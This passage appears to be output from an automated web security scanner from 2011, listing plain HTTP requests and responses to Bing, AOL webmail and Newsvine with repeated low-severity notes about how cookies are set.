GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click= HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: redcated Proxy-Connection: Keep-Alive Cookie: MUID=AD04D6F8B2FF44629973BD0674351135
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 261 Content-Type: text/html Expires: 0 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296343597-3954973; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:26:37 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: wbenedetti.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:05:09 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 80810
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /28200/aim/en-us/mail/compose-message.aspx HTTP/1.1 Host: webmail.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3awebmail.aol.com%7crp%3amail%252fcompose-message.aspx%7cuv%3aAIM%7clc%3aen-us%7cmt%3aAIM%7csnt%3aScreenName%7csid%3a9e2a15e1-c5a7-4311-bdd6-07d5c021abea&offerId=newmail-en-us-v2&seamless=novl Server: Microsoft-IIS/7.0 Set-Cookie: Context=ver:3&sid:9e2a15e1-c5a7-4311-bdd6-07d5c021abea&rt:STANDARD&ckd:.mail.aol.com&ckp:%2f&ha:XjnLSPb%2fjfv6pCJfOQsdJbtdTfc%3d&; domain=.mail.aol.com; path=/ P3P: CP="CURo TAIo IVAo IVDo ONL UNI COM NAV INT DEM STA OUR" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:22:12 GMT Content-Length: 492
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLe ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Length: 28803 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sat, 29 Jan 2011 23:52:03 GMT Connection: close Set-Cookie: _SS=SID=116E16B4881F4F76A93BF81949677C2F; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ca7a8f284da884884a06f8cb36768c20c; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:03 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:30 GMT Connection: close Set-Cookie: _SS=SID=712D1F94FAED4E98B6E572C9C51BBEF4; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:30 GMT; domain=.bing.com; path=/
Ref A: B2575C613A604708B56E80B00C179519 Ref B: F3576EA2ACED896FAE6E8179524B8516 Ref C: Sat Jan 29 15:53:30 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /finance/stockscreener HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 128153 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sun, 30 Jan 2011 01:52:17 GMT Connection: close Set-Cookie: _SS=SID=965375748DDD4D8188E499C867CEF5C8; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c03e263debce44bb8933c4855c834e0ea; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:17 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /images/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62450 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sat, 29 Jan 2011 23:52:13 GMT Connection: close Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/images Set-Cookie: _SS=SID=284EF21770EF4BD0AA7FB9D61CA8CF78; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce493bb2b667d42a4bbbffd58ff8085dc; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:13 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /local/ypdefault.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/default.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /maps/explore/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /msnhomepagehistory.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:31 GMT Connection: close Set-Cookie: _SS=SID=B16082EC97414E74BEA1ECA2227B02CA; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/
Ref A: 91E11ED41EDC42D491A070AAB3F6B959 Ref B: 2975312DDC5A4D916D738818AD098869 Ref C: Sat Jan 29 15:53:31 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: /news P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sun, 30 Jan 2011 17:02:39 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296406958; domain=.bing.com; path=/ Set-Cookie: _SS=SID=555066E581BE46E4AA183A542A326C4A; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1621022&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:02:38 GMT; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/search?q=ozzy+osbourne+justin+bieber&form=msnhpm HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 61044 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sun, 30 Jan 2011 17:04:12 GMT Connection: close Set-Cookie: _SS=SID=B97A28CBF38B449B9527EDAAE03B878F; domain=.bing.com; path=/ Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/ Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c635024954b6e4cedb19420ef37d99b0d; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1621024&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:04:11 GMT; domain=.bing.com; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Length: 0 Location: /news P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sun, 30 Jan 2011 17:03:46 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296407026; domain=.bing.com; path=/ Set-Cookie: _SS=SID=67AD5B53D3DE451B9E64A941694B912C; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1621023&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:03:46 GMT; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Location: http://www.bing.com/search P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:52:05 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296345125; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sck HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:31 GMT Connection: close Set-Cookie: _SS=SID=8F56128DF29B4CAD864EBD862D193285; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:31 GMT; domain=.bing.com; path=/
Ref A: D0950E1EACE249D2BE0BE1B31B83ECCD Ref B: B9B3F609E20511FB646C8CF91E038C47 Ref C: Sat Jan 29 15:53:31 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search?FORM=FOXSP HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /?scope=web&mkt=en-US&FORM=FOXSP P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-UA-Compatible: IE=7 Date: Sun, 30 Jan 2011 01:52:12 GMT Connection: close Vary: Accept-Encoding Set-Cookie: _HOP=I=1&TS=1296352332; domain=.bing.com; path=/ Set-Cookie: _SS=SID=CE537EFA8ED64BCEAACF15BE98BD87C5; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1620112&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 01:52:12 GMT; domain=.bing.com; path=/ Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search?q=January+29&mkt=en-us&FORM=MSNHPT HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 116 Content-Type: text/html; charset=utf-8 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sat, 29 Jan 2011 23:53:27 GMT Connection: close Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/ Set-Cookie: _SS=SID=F92E124C97024B2EB73676F002B255BD; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/ Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:27 GMT; domain=.bing.com; path=/
Ref A: 6A237C8B92934F8E8A82206F4C282E05 Ref B: E54BF75E2FC67B06BF4FA201E1C9AABE Ref C: Sat Jan 29 15:53:27 2011 PST
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
Response
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Location: http://www.bing.com/search P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" Date: Sun, 30 Jan 2011 01:52:13 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296352333; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/bird-feeders/search?q=squirrel-proof%20bird%20feeders&p1=%5bCommerceService%20scenario%3d%22f%22%20r%3d%22pricelow%7c10%2cpricehigh%7c25%2cleafcategoryid%7c5289%22%5d&vw=gr&FORM=SHOPH1&crea=012911feedersa HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
